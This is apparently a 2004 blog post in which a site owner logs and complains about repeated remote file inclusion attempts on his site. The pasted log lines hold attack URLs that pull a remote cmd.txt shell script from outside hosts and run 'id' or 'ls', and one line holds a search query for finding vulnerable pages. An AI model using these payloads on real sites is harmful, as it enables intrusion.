I may have to start causing a fuss about my hacker friend. He/She is at it again:
***Moved to comments section****
That's GMT above, straight from my logs. Might see if I can't get my ISP to look into it.
Monday, May 31, 2004
Subscribe to:
Post Comments (Atom)
5 comments:
200.255.1.54 5:47:08 31/05/2004 /index.php?pg=http://farpador.ubbi.com.br/cmd.txt?&cmd=id
200.255.1.54 5:47:10 31/05/2004 /index.php?pg=http://farpador.ubbi.com.br/cmd.txt?&cmd=id&messid=main
200.255.1.54 5:47:11 31/05/2004 /index.php?pg=message.php&messid=http://farpador.ubbi.com.br/cmd.txt?&cmd=id
200.255.1.54 5:47:11 31/05/2004 /index.php?pg=message.php&messid=http://farpador.ubbi.com.br/cmd.txt?&cmd=id
Need to save this info somewhere, in case this guy does manage to fuck my website up.
Others:
200.255.1.54 14:37:17 27/05/2004 /index.php?pg=http://farpador.ubbi.com.br/cmd.txt?&cmd=id
200.255.1.54 14:38:33 27/05/2004 /index.php?pg=http://farpador.ubbi.com.br/cmd.txt?&cmd=id&messid=91
200.255.1.54 14:38:35 27/05/2004 /index.php?pg=message.php&messid=http://farpador.ubbi.com.br/cmd.txt?&cmd=id
200.255.1.54 14:38:35 27/05/2004 /index.php?pg=message.php&messid=http://farpador.ubbi.com.br/cmd.txt?&cmd=id
200.255.1.54 6:42:13 27/05/2004 /index.php?pg=http://farpador.ubbi.com.br/cmd.txt?&cmd=id&messid=91
200.255.1.54 6:42:15 27/05/2004 /index.php?pg=message.php&messid=http://farpador.ubbi.com.br/cmd.txt?&cmd=id
200.255.1.54 6:42:15 27/05/2004 /index.php?pg=message.php&messid=http://farpador.ubbi.com.br/cmd.txt?&cmd=id
200.255.1.54 8:29:26 25/05/2004 /index.php?pg=http://sect0r.hpg.com.br/cmd.txt?&cmd=id&messid=91
200.255.1.54 8:29:36 25/05/2004 /index.php?pg=message.php&messid=http://sect0r.hpg.com.br/cmd.txt?&cmd=id
200.255.1.54 8:29:37 25/05/2004 /index.php?pg=message.php&messid=http://sect0r.hpg.com.br/cmd.txt?&cmd=id
200.255.1.54 8:31:09 25/05/2004 /index.php?pg=http://sect0r.hpg.com.br/cmd.txt?&cmd=id
I have left a message that will trigger only if someone at the above IP address accesses Zoocity. It is:
Hi there, 200.255.1.54, I hope the Brazillian weather is treating you well.
I have noticed you trying to hack into my site on the 25th, 27th and 31st May.
I have so far let this behaviour go, as I believe in giving people the chance to stop being evil by themselves, but 3 times is 2 too many. If I see you trying to hack this site again, I will take the next step, which is to inform the authorities. Feel free to come back and read the articles, but if I see your cmd.txt crap again be very sure you can cover your tracks better than you have so far. Thanks
More hackers:
200.208.43.168 16:26:20 05/06/2004 /index.php?pg=newsarchive.php http://www.google.com.br/search?q=allinurl:+index.php%3Fpg%3D*.php&hl=pt-BR&lr=&ie=UTF-8&start=50&sa=N
200.208.43.168 16:26:41 05/06/2004 /index.php?pg=http://www.geocities.com/revensite/prox.jpg&?&inclvar=body&cmd=ls
Post a Comment